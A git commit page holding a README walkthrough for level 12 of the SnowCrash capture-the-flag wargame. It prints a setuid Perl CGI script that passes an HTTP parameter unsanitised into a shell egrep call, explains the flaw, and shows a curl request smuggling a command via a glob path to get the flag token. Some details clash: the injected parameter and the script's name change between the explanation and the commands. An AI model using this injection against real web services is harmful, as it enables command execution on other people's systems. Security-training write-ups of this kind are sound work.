rparodi/snow-crash
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

feat(maiboyer/levels): adding maiboyer levels (without all issues)

Browse source
This commit is contained in:
Raphael 2026-01-28 03:49:41 +01:00
parent e674ffcf4a
commit db7f1343c5
No known key found for this signature in database
48 changed files with 1864 additions and 0 deletions
Download patch file Download diff file Expand all files Collapse all files

117
snowcrash/level12/README.md Normal file
View file

@ -0,0 +1,117 @@
# Level 12
## how to login
username: level12
password: fa6v5ateaw21peobuub8ipe6s
## Goal
run `getflag` as user `flag12`
## Actually doing something
```bash
level12@SnowCrash:~$ ll
total 16
dr-xr-x---+ 1 level12 level12 120 Mar 5 2016 ./
d--x--x--x 1 root users 340 Aug 30 2015 ../
-r-x------ 1 level12 level12 220 Apr 3 2012 .bash_logout*
-r-x------ 1 level12 level12 3518 Aug 30 2015 .bashrc*
-rwsr-sr-x+ 1 flag12 level12 464 Mar 5 2016 level12.pl*
-r-x------ 1 level12 level12 675 Apr 3 2012 .profile*
```
Perl again...
```perl
level12@SnowCrash:~$ cat level12.pl
#!/usr/bin/env perl
# localhost:4646
use CGI qw{param};
print "Content-type: text/html\n\n";
sub t {
$nn = $_[1];
$xx = $_[0];
$xx =~ tr/a-z/A-Z/;
$xx =~ s/\s.*//;
@output = `egrep "^$xx" /tmp/xd 2>&1`;
foreach $line (@output) {
($f, $s) = split(/:/, $line);
if($s =~ $nn) {
return 1;
}
}
return 0;
}
sub n {
if($_[0] == 1) {
print("..");
} else {
print(".");
}
}
n(t(param("x"), param("y")));
```
a bit more involed, lets try to make it more pretty
```perl
#!/usr/bin/env perl
# localhost:4646
use CGI qw{param};
print "Content-type: text/html\n\n";
sub t {
$arg2 = $_[1];
$arg1 = $_[0];
$arg1 =~ tr/a-z/A-Z/;
$arg1 =~ s/\s.*//;
@output = `egrep "^$arg1" /tmp/xd 2>&1`;
foreach $line (@output) {
($f, $s) = split(/:/, $line);
if($s =~ $arg2) {
return 1;
}
}
return 0;
}
sub n {
if($_[0] == 1) {
print("..");
} else {
print(".");
}
}
n(t(param("x"), param("y")));
```
when looking at this, we basically spot an `egrep` meaning that we have a shell injection.
lets look at what is given to this string
first of all, we get called with two argument, lets call them by their http parameter names `x` and `y`
in the script they are also named `arg1` for `x` and `arg2` for `y`
arg2 doesn't matter for us, so lets ignore it
arg1 is converted to uppercase, and then we only keep erverything up to the first space;
so we want to execute something like last time, meaning that we want to instert something to stop the current comment
`";cmdhere`
but the issue is that we need to have a command in uppercase (because everuthing gets convert to uppercase), however the only directory we can write to is `/tmp` which is in lowercase...
Alas this doesnt matter since we are in shell land, and we can say `/*/GETOK` to refer to the `/tmp/GETOK` script
```bash
level12@SnowCrash:~$ curl "localhost:4646?y=%22%3B/*/GETTOK%3B%22" && cat /tmp/flag
..Check flag.Here is your token : g1qKMiRpXf53AWhDaU7FEkczr
```